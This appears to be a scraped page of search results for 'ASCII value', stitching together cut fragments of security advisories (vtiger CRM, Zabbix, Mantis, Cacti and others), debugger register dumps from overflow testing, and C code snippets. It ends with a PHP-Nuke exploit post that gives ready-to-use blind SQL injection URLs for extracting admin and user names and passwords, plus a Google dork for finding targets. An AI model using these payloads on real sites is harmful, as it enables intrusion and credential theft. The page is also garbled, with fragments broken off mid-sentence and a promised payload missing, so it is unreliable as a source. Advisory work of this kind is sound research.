Next Page >>
ASCII value
Vendor http://www.vtigercrm.com
Advisory
http://www.ush.it/team/ush/hack-vtigercrm_504/vtigercrm_504.txt
Authors Giovanni "evilaliv3" Pellerano (evilaliv3 AT ush DOT it)
Antonio "s4tan" Parata (s4tan AT ush DOT it)
Francesco "ascii" Ongaro (ascii AT ush DOT it)
Date 20090818
I. BACKGROUND
Vtiger CRM is a free, full-featured, 100% Open Source CRM software ideal
Systems Affected PHP and PHP+Suhosin
Vendor http://www.php.net/
Advisory http://www.ush.it/team/ush/hack-phpfs/phpfs_mad_2.txt
Authors Giovanni "evilaliv3" Pellerano (evilaliv3 AT ush DOT it)
Antonio "s4tan" Parata (s4tan AT ush DOT it)
Francesco "ascii" Ongaro (ascii AT ush DOT it)
Alessandro "jekil" Tanasi (alessandro AT tanasi DOT it)
Date 20090725
I) Introduction
II) PHP arbitrary Local File Inclusion testing
Systems Affected FormMail 1.92 and possibly earlier versions
Severity Medium
Impact (CVSSv2) Medium 4.3/10, vector: (AV:N/AC:M/Au:N/C:P/I:N/A:N)
Vendor http://www.scriptarchive.com/formmail.html
Advisory http://www.ush.it/team/ush/hack-formmail_192/adv.txt
Authors Francesco "ascii" Ongaro (ascii AT ush DOT it)
Giovanni "evilaliv3" Pellerano (evilaliv3 AT ush DOT it)
Antonio "s4tan" Parata (s4tan AT ush DOT it)
Date 20090511
I. BACKGROUND
http://yaws.hyber.org/
http://www.boa.org/
Advisory http://www.ush.it/team/ush/hack_httpd_escape/adv.txt
Authors Giovanni "evilaliv3" Pellerano (evilaliv3 AT ush DOT it)
Alessandro "jekil" Tanasi (alessandro AT tanasi DOT it)
Francesco "ascii" Ongaro (ascii AT ush DOT it)
Date 20100110
I. BACKGROUND
nginx is a HTTP and reverse proxy server written by Igor Sysoev.
Severity High
Impact (CVSSv2) High 7.3/10, vector: (AV:N/AC:L/Au:M/C:P/I:P/A:C)
Vendor http://moodle.org/
Advisory http://www.ush.it/team/ush/hack-moodle193/moodle193.txt
Authors Antonio "s4tan" Parata (s4tan AT ush DOT it)
Francesco "ascii" Ongaro (ascii AT ush DOT it)
Giovanni "evilaliv3" Pellerano (evilaliv3 AT
digitalbullets DOT org)
Date 20081212
I. BACKGROUND
Systems Affected wClient-PHP 3.0-2 and earlier versions
Severity Medium
Impact (CVSSv2) Medium (5/10, vector: AV:N/AC:L/Au:N/C:C/I:N/A:N)
Vendor http://www.wikidsystems.com/
Advisory http://www.ush.it/team/ush/hack-wclient/wikid.txt
Author Francesco "ascii" Ongaro (ascii AT ush DOT it)
Antonio "s4tan" Parata (s4tan AT ush DOT it)
Date 20080411
I. BACKGROUND
Severity High
Impact (CVSSv2) High 8/10, vector: (AV:N/AC:L/Au:S/C:P/I:C/A:P)
Vendor http://collabtive.o-dyn.de/
Advisory http://www.ush.it/team/ush/hack-collabtive048/adv.txt
Authors Antonio "s4tan" Parata (s4tan AT ush DOT it)
Francesco "ascii" Ongaro (ascii AT ush DOT it)
Giovanni "evilaliv3" Pellerano (evilaliv3 AT
digitalbullets DOT org)
Date 20080925
I. BACKGROUND
Severity High
Impact (CVSSv2) High 9.7/10, vector: (AV:N/AC:L/Au:N/C:P/I:C/A:C)
Vendor http://www.zabbix.com/
Advisory http://www.ush.it/team/ush/hack-zabbix_162/adv.txt
Authors Antonio "s4tan" Parata (s4tan AT ush DOT it)
Francesco "ascii" Ongaro (ascii AT ush DOT it)
Giovanni "evilaliv3" Pellerano (evilaliv3 AT
digitalbullets DOT org)
Date 20090303
I. BACKGROUND
Systems Affected Jetty 7.0.0 and earlier versions
Severity Medium
Impact (CVSSv2) Medium 5/10, vector: (AV:N/AC:L/Au:N/C:P/I:N/A:N)
Vendor http://www.mortbay.org/jetty/
Advisory http://www.ush.it/team/ush/hack-jetty6x7x/jetty-adv.txt
Authors Francesco "ascii" Ongaro (ascii AT ush DOT it)
Giovanni "evilaliv3" Pellerano (evilaliv3 AT ush DOT it)
Antonio "s4tan" Parata (s4tan AT ush DOT it)
Date 20091024
I. BACKGROUND
Name PHP filesystem attack vectors
Systems Affected PHP and PHP+Suhosin
Vendor http://www.php.net/
Advisory http://www.ush.it/team/ush/hack-phpfs/phpfs_mad.txt
Authors Francesco "ascii" Ongaro (ascii AT ush DOT it)
Giovanni "evilaliv3" Pellerano (giovanni.pellerano AT
evilaliv3 DOT org)
Date 20090207
I) Introduction
> Severity High
> Impact (CVSSv2) High 9.7/10, vector: (AV:N/AC:L/Au:N/C:P/I:C/A:C)
> Vendor http://www.zabbix.com/
> Advisory http://www.ush.it/team/ush/hack-zabbix_162/adv.txt
> Authors Antonio "s4tan" Parata (s4tan AT ush DOT it)
> Francesco "ascii" Ongaro (ascii AT ush DOT it)
> Giovanni "evilaliv3" Pellerano (evilaliv3 AT
> digitalbullets DOT org)
> Date 20090303
>
> I. BACKGROUND
Severity High
Impact (CVSSv2) High 8/10, vector: (AV:N/AC:L/Au:S/C:P/I:C/A:P)
Vendor http://www.sugarcrm.com
Advisory http://www.ush.it/team/ush/hack-sugarcrm_520e/adv.txt
Authors Antonio "s4tan" Parata (s4tan AT ush DOT it)
Francesco "ascii" Ongaro (ascii AT ush DOT it)
Giovanni "evilaliv3" Pellerano (evilaliv3 AT ush DOT it)
Date 20090613
I. BACKGROUND
Severity High
Impact (CVSSv2) High 9/10, vector: (AV:N/AC:L/Au:N/C:C/I:P/A:P)
Vendor http://www.mantisbt.org/
Advisory http://www.ush.it/team/ush/hack-mantis111/adv.txt
Authors Antonio "s4tan" Parata (s4tan AT ush DOT it)
Francesco "ascii" Ongaro (ascii AT ush DOT it)
Date 20080520
I. BACKGROUND
From the Mantis web site: "Mantis is a free popular web-based
When we open the malicious file our EDX and EBP registers point to the user supplied data which might lead to code execution.
State of the registers when we opne the malicious file is:
EAX 00000000
ECX 7008A2B7 ASCII ";type="
EDX 01DC743B ASCII "
ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ
EBX 01C8C120
ESP 0324FB78
EBP 01D19008 ASCII "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
Systems Affected Cacti 0.8.7a and possibly earlier versions
Severity High
Impact (CVSSv2) High (9/10, vector: AV:N/AC:L/Au:N/C:C/I:P/A:P)
Vendor http://www.cacti.net/
Advisory http://www.ush.it/team/ush/hack-cacti087a/cacti.txt
Author Francesco "ascii" Ongaro (ascii AT ush DOT it)
Antonio "s4tan" Parata (s4tan AT ush DOT it)
Date 20071218
I. BACKGROUND
the specific condition is satisfied. By monitoring the response time, it is
possible to know if the conditional expression is True or False.
Using this technique, it is possible to extract the usernames and passwords
needed to authenticate into the Publique! management interface. Database
information can be retrieved by testing the ASCII value of each character
returned by the injected query.
For example, the following payload may be used to extract the ASCII value of
the first character returned by the query:
{
va_list ap;
char *dst; /* output destination pointer */
const char *fmt; /* current format poistion pointer */
struct lconv *lc; /* pointer to lconv structure */
char *asciivalue; /* formatted double pointer */
int flags; /* formatting options */
int pad_char; /* padding character */
int pad_size; /* pad size */
int width; /* field width */
appSprintf(unicode_buffer, "%s: %s%s", "Log", message, "\r\n");
the appSprintf function works exactly as snprintf truncating the buffer
automatically at 1024 unicode chars without adding the final NULL byte
at the end if this limit is reached.
Then the unicode_buffer is converted in an ascii string using a set of
instructions similar to the following:
for(i = 0; (cx = unicode_buffer[i]); i++) {
if(cx >= 256) cx = 0x7f;
ascii_buffer[i] = cx;
Environmental Systems Research Institute (ESRI) Inc.'s ArcSDE service
allows attackers to crash the service or potentially execute arbitrary
code.
This vulnerability specifically exists due to insufficient buffer space
when representing user-supplied numeric values in ASCII. Certain
requests result in an sprintf() call using a static-sized 8 byte stack
buffer. If an attacker supplies a number that's ASCII value cannot be
represented within 8 bytes, a stack-based buffer overflow occurs.
III. ANALYSIS
Name Original Photo Gallery Remote Command Execution
Systems Affected Original 0.11.2 version and below
Severity High
Vendor http://jimmac.musichall.cz/original.php
Advisory
http://www.ush.it/team/ascii/hack-original/advisory_updated.txt
http://www.ush.it/team/ascii/hack-original/advisory.txt
Author Francesco `ascii` Ongaro, Antonio `s4tan` Parata
Date 20070919
I. BACKGROUND
-------------------------
Cisco VPN SSL Clientless lets administrators define rules to specific
targets within the private network that WebVPN users will be able to
access. This specific targets are published using links in VPN SSL
home page. These links (URL) are protected (obfuscated) using a ROT13
substitution[2] and converting ASCII characters to hexadecimal. An
user with a valid account and without "URL entry" can access any
internal/external resource simply taken an URL, encrypt with ROT 13,
convert ASCII characters to hexadecimal and appending this string to
Cisco VPN SSL URL.
ECX 7A7A7A7A
EDX 00000000
EBX 00000003
ESP 0171ED64
EBP 0171EEFC
ESI 013579F0 ASCII
"zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz"
EDI 00C60000
EIP 77FCC453 ntdll.77FCC453
C 0 ES 0023 32bit 0(FFFFFFFF)
P 1 CS 001B 32bit 0(FFFFFFFF)
greetz to : Allah , mr.5rab , Sup3r crystal , Hack Back , Al Alame , all arab4services.net and friends
bahjawi danger khod nasi7a
EAX 0034F928 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ECX 00004141
EDX 00340608
EBX 41414141
ESP 0012BF44
EBP 0012C160
made to 'sprintf_new' with a destination buffer located in the heap that
is too small to hold the written string.
/-----------
0012724C 00392F98 ASCII "OvAcceptLang"
00127250 006C4BD0 ASCII
"en-usaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"...
Call stack of main thread
Address Stack Procedure / arguments Called from
Strings
ASCII: · … AAAAAAAAAAAAAAAAAAA · … AAAAAAAAAAAAAAAAAAA · … AAAAAAAAAAAAAAAAAAA · · … AAAAAAAAAAAAAAAAAAA · … AAAAAAAAAAAAAAAAAAA · … AAAAAAAAAAAAAAAAAAA · · … A · … AAAAAAAAAAAAAAAAAAA · … AAAAAAAAAAAAAAAAAAA
HEX : b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 b7 20 85 20 20 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
ASCII: ……………………………AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA…………AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Summarizing, the system protections are:
- Non executable stack/heap,...
- Random stack/heap base address
- ASLR (Address Space Layout Randomization)
- ASCII Armor (libraries mapped under 16MB, so null byte in its address)
- CPSHELL - a hardened shell that only allows to run specific commands and a
very restricted sub-range of ASCII chars.
Even if we are not reinventing the wheel, I honestly think that the
exploitation scenario is far from "confortable"... At the end a P.o.C.
The FindFile method allocates memory for the buffer[1].
The buffer then is used to store the contents of the first argument of
the function[2] without cheching if the argument actually fits in the
allocated buffer. This data is in turn used to start a search.
Both the unicode and ascii versions of the library use a very similar
function and have the same bug, the only real difference is the size
of the allocated buffer. The unicode version allocates 592 bytes and,
the ascii version, 320 bytes.
EAX 41424344
ECX 00E7F818
EDX 00000000
EBX 0000006E
ESP 00D3F2FC ASCII "0000000000000..."
EBP 00D3F550
ESI 00000001
EDI 00D3FE27 ASCII "XDCBA>"
EIP 00414DFC httpd_0_.00414DFC
manipulate account databases on the target resources. In the case of
*NIX-based systems the management server remotely logs in to a target
server and issues a series of shell command, using send-expect technique.
The system allows users to submit passwords containing control
characters including new line (ASCII 0x0A). The implementation of
send-expect mechanism fails to handle such passwords correctly. This
flaw allows an unprivileged Sun IDM user to execute an arbitrary UNIX
shell command by requesting a password to be changed to a specially
crafted value. The injected command will be executed with root
privileges on all UNIX systems the user is provisioned on.
#Dork : inurl:modules.php?name=Downloads "PHP-Nuke" #
# #
#####################################################################################
# [Bug] #
# #
#Admin Username : http://[site]/[path]/modules.php?name=Downloads&d_op=Add&title=1&description=1&email=attacker@devil.net&&url=0%2F*%00*/'%20OR%20ascii(substring((select+aid+from+nuke_authors+limit+0,1),1,1))=ascii_code_try%2F*
#Admin Password : http://[site]/[path]/modules.php?name=Downloads&d_op=Add&title=1&description=1&email=attacker@devil.net&&url=0%2F*%00*/'%20OR%20ascii(substring((select+pwd+from+nuke_authors+limit+0,1),1,1))=ascii_code_try%2F*
#Users Username : http://[site]/[path]/modules.php?name=Downloads&d_op=Add&title=1&description=1&email=attacker@devil.net&&url=0%2F*%00*/'%20OR%20ascii(substring((select+username+from+nuke_users+limit+0,1),1,1))=ascii_code_try%2F*
#Users Password : http://[site]/[path]/modules.php?name=Downloads&d_op=Add&title=1&description=1&email=attacker@devil.net&&url=0%2F*%00*/'%20OR%20ascii(substring((select+user_password+from+nuke_users+limit+0,1),1,1))=ascii_code_try%2F*
# #
#####################################################################################
Next Page>>
|
